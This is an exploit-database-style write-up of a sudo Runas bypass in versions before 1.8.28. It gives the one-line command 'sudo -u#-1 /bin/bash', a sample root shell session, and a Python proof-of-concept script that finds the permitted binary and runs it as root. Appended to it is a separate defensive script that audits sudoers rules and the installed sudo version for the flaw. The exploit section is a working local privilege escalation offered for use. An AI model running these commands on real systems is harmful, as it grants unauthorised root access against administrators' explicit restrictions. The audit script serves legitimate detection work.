# Exploit Title : sudo 1.8.28 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : N/A

'''Check for the user sudo permissions

sudo -l

User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash

So user hacker can't run /bin/bash as root (!root)

User hacker sudo privilege in /etc/sudoers

# User privilege specification
root    ALL=(ALL:ALL) ALL

hacker ALL=(ALL,!root) /bin/bash

With ALL specified, user hacker can run the binary /bin/bash as any user

EXPLOIT:

sudo -u#-1 /bin/bash

Example :

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#

Description :
Sudo doesn't check for the existence of the specified user id and executes the command
with an arbitrary user id under the user's sudo privileges.
-u#-1 resolves to 0, which is root's id, and /bin/bash is executed with root permission.

Proof of Concept Code :

How to use :
python3 sudo_exploit.py

'''

#!/usr/bin/python3

import os

# Get current username
username = input("Enter current username :")

# Check which binary the user can run with sudo
os.system("sudo -l > priv")
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
# Read the binary path back, dropping the trailing newline
with open("binary") as binary_file:
    binary = binary_file.read().strip()

# Execute sudo exploit
print("Lets hope it works")
os.system("sudo -u#-1 " + binary)
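
A defender's check for the configuration described above, as an added example that is not part of the original exploit file: it flags sudoers rules whose Runas list combines `ALL` with a negated root entry and reports whether the installed sudo predates 1.8.28, the release the header names as fixed. The sample sudoers text and version string are constructed, the function names are hypothetical, and treating `!#0` as another spelling of `!root` is an assumption.

```python
import re

FIXED = (1, 8, 28)  # release the page's header names as carrying the fix

# Matches "who host = (runas_users[:runas_groups]) commands"; comment lines fail on '#'.
RULE = re.compile(
    r'^\s*(?P<who>[^\s#=]+)\s+(?P<host>[^=\s]+)\s*=\s*'
    r'\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$')

# Constructed sample input, modelled on the sudoers excerpt in the write-up.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
hacker  ALL=(ALL,!root) /bin/bash
"""
SAMPLE_VERSION = "Sudo version 1.8.27"  # constructed first line of `sudo -V`


def parse_version(text):
    """Return (major, minor, patch) from a `sudo -V` line; 'p1' suffixes are ignored."""
    m = re.search(r'(\d+)\.(\d+)\.(\d+)', text)
    if m is None:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(part) for part in m.groups())


def risky_rules(sudoers_text):
    """List (line, who, commands) for rules that allow ALL users except root."""
    findings = []
    for lineno, line in enumerate(sudoers_text.splitlines(), 1):
        m = RULE.match(line)
        if m is None:
            continue
        # Only the user part of the Runas spec matters; drop any ":group" part.
        users = [u.strip() for u in m['runas'].split(':')[0].split(',')]
        # Assumption: "!#0" is treated as another spelling of "!root".
        if 'ALL' in users and any(u in ('!root', '!#0') for u in users):
            findings.append((lineno, m['who'], m['cmds'].strip()))
    return findings


def audit(sudoers_text, version_text):
    """Pair every risky rule with whether the installed sudo predates the fix."""
    bypassable = parse_version(version_text) < FIXED
    return [{'line': n, 'who': w, 'commands': c, 'bypassable': bypassable}
            for n, w, c in risky_rules(sudoers_text)]


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS, SAMPLE_VERSION):
        print(finding)
```

On a real host, feed it the contents of `/etc/sudoers` (and any included files) plus the first line of `sudo -V`; a rule reported with `bypassable: True` should be rewritten to name the permitted target users explicitly, and sudo upgraded.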